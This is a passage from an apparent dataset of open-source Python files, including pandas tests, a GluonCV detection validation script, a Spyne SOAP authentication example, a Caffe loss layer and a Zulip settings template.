set([dtype.kind,dtype2.kind])\n if not len(typs-set(['f','i','u'])) and (dtype.kind == 'f' or dtype2.kind == 'f'):\n return 'f'\n return None\n\n def get_result_type(dtype, dtype2):\n result = float_result_type(dtype, dtype2)\n if result is not None:\n return result\n result = int_result_type(dtype, dtype2)\n if result is not None:\n return result\n return 'O'\n\n for dtype in dtypes:\n for dtype2 in dtypes:\n if dtype == dtype2:\n continue\n\n expected = get_result_type(dtype, dtype2)\n result = pd.concat([Series(dtype=dtype),\n Series(dtype=dtype2)]).dtype\n self.assertEqual(result.kind, expected)\n\n def test_concat_empty_series_dtypes(self):\n\n # bools\n 
self.assertEqual(pd.concat([Series(dtype=np.bool_),\n Series(dtype=np.int32)]).dtype, np.int32)\n self.assertEqual(pd.concat([Series(dtype=np.bool_),\n Series(dtype=np.float32)]).dtype, np.object_)\n\n # datetimelike\n self.assertEqual(pd.concat([Series(dtype='m8[ns]'),\n Series(dtype=np.bool)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='m8[ns]'),\n Series(dtype=np.int64)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='M8[ns]'),\n Series(dtype=np.bool)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='M8[ns]'),\n Series(dtype=np.int64)]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='M8[ns]'),\n Series(dtype=np.bool_),\n Series(dtype=np.int64)]).dtype, np.object_)\n\n # categorical\n self.assertEqual(pd.concat([Series(dtype='category'),\n Series(dtype='category')]).dtype, 'category')\n self.assertEqual(pd.concat([Series(dtype='category'),\n Series(dtype='float64')]).dtype, np.object_)\n self.assertEqual(pd.concat([Series(dtype='category'),\n Series(dtype='object')]).dtype, 'category')\n\n # sparse\n result = pd.concat([Series(dtype='float64').to_sparse(),\n Series(dtype='float64').to_sparse()])\n self.assertEqual(result.dtype,np.float64)\n self.assertEqual(result.ftype,'float64:sparse')\n\n result = pd.concat([Series(dtype='float64').to_sparse(),\n Series(dtype='float64')])\n self.assertEqual(result.dtype,np.float64)\n self.assertEqual(result.ftype,'float64:sparse')\n\n result = pd.concat([Series(dtype='float64').to_sparse(),\n Series(dtype='object')])\n self.assertEqual(result.dtype,np.object_)\n self.assertEqual(result.ftype,'object:dense')\n\n def test_searchsorted_numeric_dtypes_scalar(self):\n s = Series([1, 2, 90, 1000, 3e9])\n r = s.searchsorted(30)\n e = 2\n tm.assert_equal(r, e)\n\n r = s.searchsorted([30])\n e = np.array([2])\n tm.assert_array_equal(r, e)\n\n def test_searchsorted_numeric_dtypes_vector(self):\n s = Series([1, 2, 90, 1000, 3e9])\n r = s.searchsorted([91, 2e6])\n e = np.array([3, 4])\n tm.assert_array_equal(r, e)\n\n def test_search_sorted_datetime64_scalar(self):\n s = Series(pd.date_range('20120101', periods=10, freq='2D'))\n v = pd.Timestamp('20120102')\n r = s.searchsorted(v)\n e = 1\n tm.assert_equal(r, e)\n\n def test_search_sorted_datetime64_list(self):\n s = Series(pd.date_range('20120101', periods=10, freq='2D'))\n v = [pd.Timestamp('20120102'), pd.Timestamp('20120104')]\n r = s.searchsorted(v)\n e = np.array([1, 2])\n tm.assert_array_equal(r, e)\n\n def test_searchsorted_sorter(self):\n # GH8490\n s = Series([3, 1, 2])\n r = s.searchsorted([0, 3], sorter=np.argsort(s))\n e = np.array([0, 2])\n tm.assert_array_equal(r, e)\n\n\n\nclass TestSeriesNonUnique(tm.TestCase):\n\n _multiprocess_can_split_ = True\n\n def setUp(self):\n pass\n\n def test_basic_indexing(self):\n s = Series(np.random.randn(5), index=['a', 'b', 'a', 'a', 'b'])\n\n self.assertRaises(IndexError, s.__getitem__, 5)\n self.assertRaises(IndexError, s.__setitem__, 5, 0)\n\n self.assertRaises(KeyError, s.__getitem__, 'c')\n\n s = s.sort_index()\n\n self.assertRaises(IndexError, s.__getitem__, 5)\n self.assertRaises(IndexError, s.__setitem__, 5, 0)\n\n\n def test_int_indexing(self):\n s = Series(np.random.randn(6), index=[0, 0, 1, 1, 2, 2])\n\n self.assertRaises(KeyError, s.__getitem__, 5)\n\n self.assertRaises(KeyError, s.__getitem__, 'c')\n\n # not monotonic\n s = Series(np.random.randn(6), index=[2, 2, 0, 0, 1, 1])\n\n self.assertRaises(KeyError, s.__getitem__, 5)\n\n self.assertRaises(KeyError, s.__getitem__, 'c')\n\n def 
test_datetime_indexing(self):\n from pandas import date_range\n\n index = date_range('1/1/2000', '1/7/2000')\n index = index.repeat(3)\n\n s = Series(len(index), index=index)\n stamp = Timestamp('1/8/2000')\n\n self.assertRaises(KeyError, s.__getitem__, stamp)\n s[stamp] = 0\n self.assertEqual(s[stamp], 0)\n\n # not monotonic\n s = Series(len(index), index=index)\n s = s[::-1]\n\n self.assertRaises(KeyError, s.__getitem__, stamp)\n s[stamp] = 0\n self.assertEqual(s[stamp], 0)\n\n def test_reset_index(self):\n df = tm.makeDataFrame()[:5]\n ser = df.stack()\n ser.index.names = ['hash', 'category']\n\n ser.name = 'value'\n df = ser.reset_index()\n self.assertIn('value', df)\n\n df = ser.reset_index(name='value2')\n self.assertIn('value2', df)\n\n # check inplace\n s = ser.reset_index(drop=True)\n s2 = ser\n s2.reset_index(drop=True, inplace=True)\n assert_series_equal(s, s2)\n\n # level\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n s = Series(np.random.randn(6), index=index)\n rs = s.reset_index(level=1)\n self.assertEqual(len(rs.columns), 2)\n\n rs = s.reset_index(level=[0, 2], drop=True)\n self.assertTrue(rs.index.equals(Index(index.get_level_values(1))))\n tm.assert_isinstance(rs, Series)\n\n def test_set_index_makes_timeseries(self):\n idx = tm.makeDateIndex(10)\n\n s = Series(lrange(10))\n s.index = idx\n\n self.assertTrue(s.is_time_series == True)\n\n def test_timeseries_coercion(self):\n idx = tm.makeDateIndex(10000)\n ser = Series(np.random.randn(len(idx)), idx.astype(object))\n self.assertTrue(ser.is_time_series)\n self.assertIsInstance(ser.index, DatetimeIndex)\n\n def test_replace(self):\n N = 100\n ser = Series(np.fabs(np.random.randn(N)), tm.makeDateIndex(N),\n dtype=object)\n ser[:5] = np.nan\n ser[6:10] = 'foo'\n ser[20:30] = 'bar'\n\n # replace list with a single value\n rs = ser.replace([np.nan, 'foo', 'bar'], -1)\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -1).all())\n self.assertTrue((rs[20:30] == -1).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values\n rs = ser.replace({np.nan: -1, 'foo': -2, 'bar': -3})\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -2).all())\n self.assertTrue((rs[20:30] == -3).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values with 2 lists\n rs2 = ser.replace([np.nan, 'foo', 'bar'], [-1, -2, -3])\n assert_series_equal(rs, rs2)\n\n # replace inplace\n ser.replace([np.nan, 'foo', 'bar'], -1, inplace=True)\n self.assertTrue((ser[:5] == -1).all())\n self.assertTrue((ser[6:10] == -1).all())\n self.assertTrue((ser[20:30] == -1).all())\n\n def test_repeat(self):\n s = Series(np.random.randn(3), index=['a', 'b', 'c'])\n\n reps = s.repeat(5)\n exp = Series(s.values.repeat(5), index=s.index.values.repeat(5))\n assert_series_equal(reps, exp)\n\n to_rep = [2, 3, 4]\n reps = s.repeat(to_rep)\n exp = Series(s.values.repeat(to_rep),\n index=s.index.values.repeat(to_rep))\n assert_series_equal(reps, exp)\n\n def test_unique_data_ownership(self):\n # it works! 
#1807\n Series(Series([\"a\", \"c\", \"b\"]).unique()).sort()\n\nif __name__ == '__main__':\n nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],\n exit=False)\n"} {"ext": "py", "sha": "1a2fc5fef9537c0af5cbc7caa7253d9e1dc9a7cc", "content": "import os\nfrom os import path\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom typing import Union\n\nfrom pyspark.sql.types import DataType\nfrom pyspark.sql.types import StructType\nfrom spark_fhir_schemas.r4.complex_types.address import AddressSchema\nfrom spark_fhir_schemas.r4.resources.explanationofbenefit import (\n ExplanationOfBenefitSchema,\n)\nfrom spark_fhir_schemas.r4.resources.patient import PatientSchema\n\n\ndef test_simple() -> None:\n data_dir: Path = Path(__file__).parent.joinpath(\"./\")\n temp_folder = data_dir.joinpath(\"./temp\")\n if path.isdir(temp_folder):\n rmtree(temp_folder)\n\n os.mkdir(temp_folder)\n\n schema: Union[StructType, DataType] = PatientSchema.get_schema()\n assert isinstance(schema, StructType)\n\n # print(schema)\n print(\"------- Patient --------\")\n print(schema.json())\n\n with open(temp_folder.joinpath(\"patient_schema.json\"), \"w+\") as file:\n file.write(schema.json())\n\n print(\"------- Address --------\")\n schema = AddressSchema.get_schema()\n print(schema.json())\n with open(temp_folder.joinpath(\"address_schema.json\"), \"w+\") as file:\n file.write(schema.json())\n\n print(\"------- ExplanationOfBenefitSchema --------\")\n schema = ExplanationOfBenefitSchema.get_schema()\n print(schema.json())\n # noinspection SpellCheckingInspection\n with open(temp_folder.joinpath(\"explanationofbenefit_schema.json\"), \"w\") as file:\n file.write(schema.json())\n\n assert 1 == 1\n"} {"ext": "py", "sha": "1a2fc664e4da7f455d63942dd2554fa8b531bffc", "content": "from __future__ import division\nfrom __future__ import print_function\n\nimport os\n# disable autotune\nos.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0'\nimport argparse\nimport glob\nimport logging\nlogging.basicConfig(level=logging.INFO)\nimport time\nimport numpy as np\nimport mxnet as mx\nfrom tqdm import tqdm\nfrom mxnet import nd\nfrom mxnet import gluon\nimport gluoncv as gcv\ngcv.utils.check_version('0.6.0')\nfrom gluoncv import data as gdata\nfrom gluoncv.data import batchify\nfrom gluoncv.data.transforms.presets.rcnn import FasterRCNNDefaultValTransform\nfrom gluoncv.utils.metrics.voc_detection import VOC07MApMetric\nfrom gluoncv.utils.metrics.coco_detection import COCODetectionMetric\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Validate Faster-RCNN networks.')\n parser.add_argument('--network', type=str, default='resnet50_v1b',\n help=\"Base feature extraction network name\")\n parser.add_argument('--dataset', type=str, default='voc',\n help='Training dataset.')\n parser.add_argument('--num-workers', '-j', dest='num_workers', type=int,\n default=4, help='Number of data workers')\n parser.add_argument('--gpus', type=str, default='0',\n help='Training with GPUs, you can specify 1,3 for example.')\n parser.add_argument('--pretrained', type=str, default='True',\n help='Load weights from previously saved parameters.')\n parser.add_argument('--save-prefix', type=str, default='',\n help='Saving parameter prefix')\n parser.add_argument('--save-json', action='store_true',\n help='Save coco output json')\n parser.add_argument('--eval-all', action='store_true',\n help='Eval all models begins with save prefix. 
Use with pretrained.')\n parser.add_argument('--norm-layer', type=str, default=None,\n help='Type of normalization layer to use. '\n 'If set to None, backbone normalization layer will be fixed,'\n ' and no normalization layer will be used. '\n 'Currently supports \\'bn\\', and None, default is None')\n parser.add_argument('--use-fpn', action='store_true',\n help='Whether to use feature pyramid network.')\n args = parser.parse_args()\n return args\n\ndef get_dataset(dataset, args):\n if dataset.lower() == 'voc':\n val_dataset = gdata.VOCDetection(\n splits=[(2007, 'test')])\n val_metric = VOC07MApMetric(iou_thresh=0.5, class_names=val_dataset.classes)\n elif dataset.lower() == 'coco':\n val_dataset = gdata.COCODetection(splits='instances_val2017', skip_empty=False)\n val_metric = COCODetectionMetric(val_dataset, args.save_prefix + '_eval',\n cleanup=not args.save_json)\n else:\n raise NotImplementedError('Dataset: {} not implemented.'.format(dataset))\n return val_dataset, val_metric\n\ndef get_dataloader(net, val_dataset, batch_size, num_workers):\n \"\"\"Get dataloader.\"\"\"\n val_bfn = batchify.Tuple(*[batchify.Append() for _ in range(3)])\n val_loader = mx.gluon.data.DataLoader(\n val_dataset.transform(FasterRCNNDefaultValTransform(net.short, net.max_size)),\n batch_size, False, batchify_fn=val_bfn, last_batch='keep', num_workers=num_workers)\n return val_loader\n\ndef split_and_load(batch, ctx_list):\n \"\"\"Split data to 1 batch each device.\"\"\"\n num_ctx = len(ctx_list)\n new_batch = []\n for i, data in enumerate(batch):\n new_data = [x.as_in_context(ctx) for x, ctx in zip(data, ctx_list)]\n new_batch.append(new_data)\n return new_batch\n\ndef validate(net, val_data, ctx, eval_metric, size):\n \"\"\"Test on validation dataset.\"\"\"\n clipper = gcv.nn.bbox.BBoxClipToImage()\n eval_metric.reset()\n net.hybridize(static_alloc=True)\n with tqdm(total=size) as pbar:\n for ib, batch in enumerate(val_data):\n batch = split_and_load(batch, ctx_list=ctx)\n det_bboxes = []\n det_ids = []\n det_scores = []\n gt_bboxes = []\n gt_ids = []\n gt_difficults = []\n for x, y, im_scale in zip(*batch):\n # get prediction results\n ids, scores, bboxes = net(x)\n det_ids.append(ids)\n det_scores.append(scores)\n # clip to image size\n det_bboxes.append(clipper(bboxes, x))\n # rescale to original resolution\n im_scale = im_scale.reshape((-1)).asscalar()\n det_bboxes[-1] *= im_scale\n # split ground truths\n gt_ids.append(y.slice_axis(axis=-1, begin=4, end=5))\n gt_bboxes.append(y.slice_axis(axis=-1, begin=0, end=4))\n gt_bboxes[-1] *= im_scale\n gt_difficults.append(y.slice_axis(axis=-1, begin=5, end=6) if y.shape[-1] > 5 else None)\n # update metric\n for det_bbox, det_id, det_score, gt_bbox, gt_id, gt_diff in zip(det_bboxes, det_ids, det_scores, gt_bboxes, gt_ids, gt_difficults):\n eval_metric.update(det_bbox, det_id, det_score, gt_bbox, gt_id, gt_diff)\n pbar.update(len(ctx))\n return eval_metric.get()\n\nif __name__ == '__main__':\n args = parse_args()\n\n # contexts\n ctx = [mx.gpu(int(i)) for i in args.gpus.split(',') if i.strip()]\n ctx = ctx if ctx else [mx.cpu()]\n args.batch_size = len(ctx) # 1 batch per device\n\n # network\n kwargs = {}\n module_list = []\n if args.use_fpn:\n module_list.append('fpn')\n if args.norm_layer is not None:\n module_list.append(args.norm_layer)\n if args.norm_layer == 'bn':\n kwargs['num_devices'] = len(args.gpus.split(','))\n net_name = '_'.join(('faster_rcnn', *module_list, args.network, args.dataset))\n args.save_prefix += net_name\n if args.pretrained.lower() 
in ['true', '1', 'yes', 't']:\n net = gcv.model_zoo.get_model(net_name, pretrained=True, **kwargs)\n else:\n net = gcv.model_zoo.get_model(net_name, pretrained=False, **kwargs)\n net.load_parameters(args.pretrained.strip(), cast_dtype=True)\n net.collect_params().reset_ctx(ctx)\n\n # validation data\n val_dataset, eval_metric = get_dataset(args.dataset, args)\n val_data = get_dataloader(\n net, val_dataset, args.batch_size, args.num_workers)\n\n # validation\n if not args.eval_all:\n names, values = validate(net, val_data, ctx, eval_metric, len(val_dataset))\n for k, v in zip(names, values):\n print(k, v)\n else:\n saved_models = glob.glob(args.save_prefix + '*.params')\n for epoch, saved_model in enumerate(sorted(saved_models)):\n print('[Epoch {}] Validating from {}'.format(epoch, saved_model))\n net.load_parameters(saved_model)\n net.collect_params().reset_ctx(ctx)\n map_name, mean_ap = validate(net, val_data, ctx, eval_metric, len(val_dataset))\n val_msg = '\\n'.join(['{}={}'.format(k, v) for k, v in zip(map_name, mean_ap)])\n print('[Epoch {}] Validation: \\n{}'.format(epoch, val_msg))\n current_map = float(mean_ap[-1])\n with open(args.save_prefix+'_best_map.log', 'a') as f:\n f.write('\\n{:04d}:\\t{:.4f}'.format(epoch, current_map))\n"} {"ext": "py", "sha": "1a2fc6a45177c4fb910e60a72147540646329b18", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n pygments.styles.rrt\n ~~~~~~~~~~~~~~~~~~~\n\n pygments \"rrt\" theme, based on Zap and Emacs defaults.\n\n :copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nfrom pygments.style import Style\nfrom pygments.token import Comment, Name, Keyword, String\n\n\nclass RrtStyle(Style):\n \"\"\"\n Minimalistic \"rrt\" theme, based on Zap and Emacs defaults.\n \"\"\"\n\n background_color = '#000000'\n highlight_color = '#0000ff'\n\n styles = {\n Comment: '#00ff00',\n Name.Function: '#ffff00',\n Name.Variable: '#eedd82',\n Name.Constant: '#7fffd4',\n Keyword: '#ff0000',\n Comment.Preproc: '#e5e5e5',\n String: '#87ceeb',\n Keyword.Type: '#ee82ee',\n }\n"} {"ext": "py", "sha": "1a2fc6d60a0e0c27df3ace927b3016c87b619670", "content": "from scraping.funtion import html_convert_python\n\ndef get_data_page_locate(url):\n\n soup = html_convert_python( url )\n data = []\n\n for row in soup.find(\"ul\", {\"id\": \"postcode-list\"}).find_all(\"li\"):\n\n url = row.find('a').attrs['href']\n data.append(url)\n\n return data\n\n\ndef get_data_page_region(url):\n\n soup = html_convert_python( url )\n data = []\n\n for row in soup.find_all(\"div\", {\"class\": \"col-md-3 col-xs-4\"}):\n\n url = row.a.get('href')\n print(url)\n data.append(url)\n\n return data\n\n\ndef get_data_page_postcode(url):\n\n soup = html_convert_python( url )\n data = []\n\n for row in soup.find_all(\"div\", {\"class\": \"col-md-3 col-xs-12\"}):\n\n url = row.a.string\n print(url)\n data.append(url)\n\n return data\n"} {"ext": "py", "sha": "1a2fc6f2e7b702b78f689e41f3dc9f0edb25c1c4", "content": "#!/usr/bin/env python\n#encoding: utf8\n#\n# Copyright © Burak Arslan ,\n# Arskom Ltd. http://www.arskom.com.tr\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# 2. 
Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the owner nor the names of its contributors may be\n# used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT,\n# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport logging\nimport random\nimport sys\nimport base64\n\nfrom Cookie import SimpleCookie\n\n# bcrypt seems to be among the latest consensus around cryptograpic circles on\n# storing passwords.\n# You need the package from http://code.google.com/p/py-bcrypt/\n# You can install it by running easy_install py-bcrypt.\ntry:\n import bcrypt\nexcept ImportError:\n print('easy_install --user py-bcrypt to get it.')\n raise\n\nfrom spyne.application import Application\nfrom spyne.decorator import rpc\nfrom spyne.error import ResourceNotFoundError\nfrom spyne.model.complex import ComplexModel\nfrom spyne.model.fault import Fault\nfrom spyne.model.primitive import Mandatory\nfrom spyne.model.primitive import String\nfrom spyne.protocol.soap import Soap11\nfrom spyne.server.wsgi import WsgiApplication\nfrom spyne.service import ServiceBase\n\nclass PublicKeyError(ResourceNotFoundError):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self, value):\n Fault.__init__(self,\n faultcode='Client.KeyError',\n faultstring='Value %r not found' % value\n )\n\n\nclass AuthenticationError(Fault):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self, user_name):\n # TODO: self.transport.http.resp_code = HTTP_401\n\n Fault.__init__(self,\n faultcode='Client.AuthenticationError',\n faultstring='Invalid authentication request for %r' % user_name\n )\n\n\nclass AuthorizationError(Fault):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self):\n # TODO: self.transport.http.resp_code = HTTP_401\n\n Fault.__init__(self,\n faultcode='Client.AuthorizationError',\n faultstring='You are not authorized to access this resource.'\n )\n\nclass UnauthenticatedError(Fault):\n __namespace__ = 'spyne.examples.authentication'\n\n def __init__(self):\n Fault.__init__(self,\n faultcode='Client.UnauthenticatedError',\n faultstring='This resource can only be accessed after authentication.'\n )\n\nclass SpyneDict(dict):\n def __getitem__(self, key):\n try:\n return dict.__getitem__(self, key)\n except KeyError:\n raise PublicKeyError(key)\n\n\nclass Preferences(ComplexModel):\n __namespace__ = 'spyne.examples.authentication'\n\n language = String(max_len=2)\n time_zone = String\n\n\nuser_db = {\n 'neo': bcrypt.hashpw('Wh1teR@bbit', bcrypt.gensalt()),\n}\n\nsession_db = set()\n\npreferences_db = SpyneDict({\n 'neo': 
Preferences(language='en', time_zone='Underground/Zion'),\n 'smith': Preferences(language='xx', time_zone='Matrix/Core'),\n})\n\n\nclass UserService(ServiceBase):\n __tns__ = 'spyne.examples.authentication'\n\n @rpc(Mandatory.String, Mandatory.String, _returns=None,\n _throws=AuthenticationError)\n def authenticate(ctx, user_name, password):\n password_hash = user_db.get(user_name, None)\n\n if password_hash is None:\n raise AuthenticationError(user_name)\n\n if bcrypt.hashpw(password, password_hash) != password_hash:\n raise AuthenticationError(user_name)\n\n session_id = (user_name, '%x' % random.randint(1<<128, (1<<132)-1))\n session_db.add(session_id)\n\n cookie = SimpleCookie()\n cookie[\"session-id\"] = base64.urlsafe_b64encode(str(session_id[0]) + \"\\0\" + str(session_id[1]))\n cookie[\"session-id\"][\"max-age\"] = 3600\n header_name, header_value = cookie.output().split(\":\", 1)\n ctx.transport.resp_headers[header_name] = header_value.strip()\n from pprint import pprint\n pprint(ctx.transport.resp_headers)\n\n\n @rpc(Mandatory.String, _throws=PublicKeyError, _returns=Preferences)\n def get_preferences(ctx, user_name):\n # Only allow access to the users own preferences.\n if user_name != ctx.udc:\n raise AuthorizationError()\n\n retval = preferences_db[user_name]\n\n return retval\n\ndef _on_method_call(ctx):\n if ctx.descriptor.name == \"authenticate\":\n # No checking of session cookie for call to authenticate\n return\n\n cookie = SimpleCookie()\n http_cookie = ctx.transport.req_env.get(\"HTTP_COOKIE\")\n if http_cookie:\n cookie.load(http_cookie)\n if \"session-id\" not in cookie:\n raise UnauthenticatedError()\n session_cookie = cookie[\"session-id\"].value\n session_id = tuple(base64.urlsafe_b64decode(session_cookie).split(\"\\0\", 1))\n if not session_id in session_db:\n raise AuthenticationError(session_id[0])\n ctx.udc = session_id[0] # user name\n\n\nUserService.event_manager.add_listener('method_call', _on_method_call)\n\nif __name__=='__main__':\n from spyne.util.wsgi_wrapper import run_twisted\n\n logging.basicConfig(level=logging.DEBUG)\n logging.getLogger('spyne.protocol.xml').setLevel(logging.DEBUG)\n logging.getLogger('twisted').setLevel(logging.DEBUG)\n\n application = Application([UserService],\n tns='spyne.examples.authentication',\n in_protocol=Soap11(validator='lxml'),\n out_protocol=Soap11()\n )\n\n twisted_apps = [\n (WsgiApplication(application), 'app'),\n ]\n\n sys.exit(run_twisted(twisted_apps, 7789))\n"} {"ext": "py", "sha": "1a2fc7ee57cb4ab1366ee1f2bd9e223a48a4f673", "content": "__author__ = 'dereyly'\nimport sys\n#sys.path.append('/home/dereyly/progs/caffe_cudnn33/python_33')\n#sys.path.append('/home/dereyly/progs/caffe-master-triplet/python')\nimport caffe\nimport numpy as np\n\n'''\nlayer {\n name: 'rcls_lost_my'\n type: 'Python'\n bottom: 'feats'\n bottom: 'labels'\n top: 'cls_lost_my'\n python_param {\n module: 'fast_rcnn.skip_softmax_loss'\n layer: 'SoftmaxLossLayer'\n #param_str: \"{'ratios': [0.5, 1, 2], 'scales': [2, 4, 8, 16, 32]}\"\n }\n loss_weight: 1\n}\n'''\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n sf = np.exp(x)\n sum_sf=np.sum(sf, axis=1)\n for i in range(x.shape[0]):\n sf[i]/=sum_sf[i]\n return sf\n\nclass SoftmaxLossLayer(caffe.Layer):\n\n def setup(self, bottom, top):\n # check input pair\n if len(bottom) != 2:\n raise Exception(\"Need two inputs to compute distance.\")\n # DBG\n self.count = 0\n self.skip_count = 0\n top[0].reshape(1)\n\n def reshape(self, bottom, top):\n # check input 
dimensions match\n # difference is shape of inputs\n sz=bottom[0].data.shape\n self.batch_sz=sz[0]\n self.diff = np.zeros((sz[0],sz[1]),dtype=np.float32)\n self.lbl_gt=np.zeros((sz[0],sz[1]),dtype=np.float32)\n # loss output is scalar\n\n\n\n #top[1].reshape(self.batch_sz)\n\n def forward(self, bottom, top):\n self.count+=1\n sz=bottom[0].data.shape\n self.lbl_gt=np.zeros((sz[0],sz[1]),dtype=np.float32)\n lbl_idx=bottom[1].data\n lbl_idx=lbl_idx.astype(dtype= int)\n for i in range(self.batch_sz):\n self.lbl_gt[i,lbl_idx[i]]=1\n soft_max=softmax(bottom[0].data)\n #loss = -self.lbl_gt*np.log(np.maximum(soft_max,np.finfo(np.float32).eps))\n\n loss=0\n for i in range(self.batch_sz):\n loss -= np.log(np.maximum(soft_max[i][lbl_idx[i]],np.finfo(np.float32).eps))\n\n #loss2=-np.log(soft_max)\n #for i in range(self.batch_sz):\n # loss[i,lbl_idx[i]]=0\n #print bottom[1].data.shape\n self.diff[...] = soft_max-self.lbl_gt\n\n for i in range(self.batch_sz):\n coeff=soft_max[i,lbl_idx[i]]\n self.diff[i]*=coeff\n self.skip_count+=coeff\n if self.count%100==0:\n print('-- skip count -- ',self.skip_count/(100.0*self.batch_sz))\n self.skip_count=0\n top[0].data[...] = np.sum(loss) / bottom[0].num\n #top[1].data[...] = loss\n\n def backward(self, top, propagate_down, bottom):\n #pass\n bottom[0].diff[...] = self.diff / bottom[0].num\n\n"} {"ext": "py", "sha": "1a2fc822be9317ed37f6e3aa7339504f9dd0a7a2", "content": "from typing import Optional, Tuple\n\n################################################################\n# Zulip Server settings.\n#\n# This file controls settings that affect the whole Zulip server.\n# See our documentation at:\n# https://zulip.readthedocs.io/en/latest/production/settings.html\n#\n# For developer documentation on the Zulip settings system, see:\n# https://zulip.readthedocs.io/en/latest/subsystems/settings.html\n#\n# Remember to restart the server after making changes here!\n# su zulip -c /home/zulip/deployments/current/scripts/restart-server\n\n\n################################\n# Mandatory settings.\n#\n# These settings MUST be set in production. In a development environment,\n# sensible default values will be used.\n\n# The email address for the person or team who maintains the Zulip\n# installation. Note that this is a public-facing email address; it may\n# appear on 404 pages, is used as the sender's address for many automated\n# emails, and is advertised as a support address. An email address like\n# support@example.com is totally reasonable, as is admin@example.com.\n# Do not put a display name; e.g. 'support@example.com', not\n# 'Zulip Support '.\nZULIP_ADMINISTRATOR = 'zulip-admin@example.com'\n\n# The user-accessible Zulip hostname for this installation, e.g.\n# zulip.example.com. This should match what users will put in their\n# web browser. If you want to allow multiple hostnames, add the rest\n# to ALLOWED_HOSTS.\n#\n# If you need to access the server on a specific port, you should set\n# EXTERNAL_HOST to e.g. zulip.example.com:1234 here.\nEXTERNAL_HOST = 'zulip.example.com'\n\n# Alternative hostnames. A comma-separated list of strings\n# representing the host/domain names that your users can enter in\n# their browsers to access Zulip. This is a security measure; for\n# details, see the Django documentation:\n# https://docs.djangoproject.com/en/1.11/ref/settings/#allowed-hosts\n#\n# Zulip automatically adds to this list 'localhost', '127.0.0.1', and\n# patterns representing EXTERNAL_HOST and subdomains of it. 
If you are\n# accessing your server by other hostnames, list them here.\n#\n# Note that these should just be hostnames, without port numbers.\n#ALLOWED_HOSTS = ['zulip-alias.example.com', '192.0.2.1']\n\n# If EXTERNAL_HOST is not a valid domain name (e.g. an IP address),\n# set FAKE_EMAIL_DOMAIN below to a domain that Zulip can use when\n# generating (fake) email addresses for bots, dummy users, etc.\n#FAKE_EMAIL_DOMAIN = 'fake-domain.example.com'\n\n\n################\n# Outgoing email (SMTP) settings.\n#\n# Zulip needs to be able to send email (that is, use SMTP) so it can\n# confirm new users' email addresses and send notifications.\n#\n# If you don't already have an SMTP provider, free ones are available.\n#\n# For more details, including a list of free SMTP providers and\n# advice for troubleshooting, see the Zulip documentation:\n# https://zulip.readthedocs.io/en/latest/production/email.html\n\n# EMAIL_HOST and EMAIL_HOST_USER are generally required.\n#EMAIL_HOST = 'smtp.example.com'\n#EMAIL_HOST_USER = ''\n\n# Passwords and secrets are not stored in this file. The password\n# for user EMAIL_HOST_USER goes in `/etc/zulip/zulip-secrets.conf`.\n# In that file, set `email_password`. For example:\n# email_password = abcd1234\n\n# EMAIL_USE_TLS and EMAIL_PORT are required for most SMTP providers.\n#EMAIL_USE_TLS = True\n#EMAIL_PORT = 587\n\n# The noreply address to be used as the sender for certain generated\n# emails. Messages sent to this address could contain sensitive user\n# data and should not be delivered anywhere. The default is\n# e.g. noreply-{random_token}@zulip.example.com (if EXTERNAL_HOST is\n# zulip.example.com). There are potential security issues if you set\n# ADD_TOKENS_TO_NOREPLY_ADDRESS=False to remove the token; see\n# https://zulip.readthedocs.io/en/latest/production/email.html for details.\n#ADD_TOKENS_TO_NOREPLY_ADDRESS = True\n#TOKENIZED_NOREPLY_EMAIL_ADDRESS = \"noreply-{token}@example.com\"\n# NOREPLY_EMAIL_ADDRESS is the sender for noreply emails that don't\n# contain confirmation links (where the security problem fixed by\n# 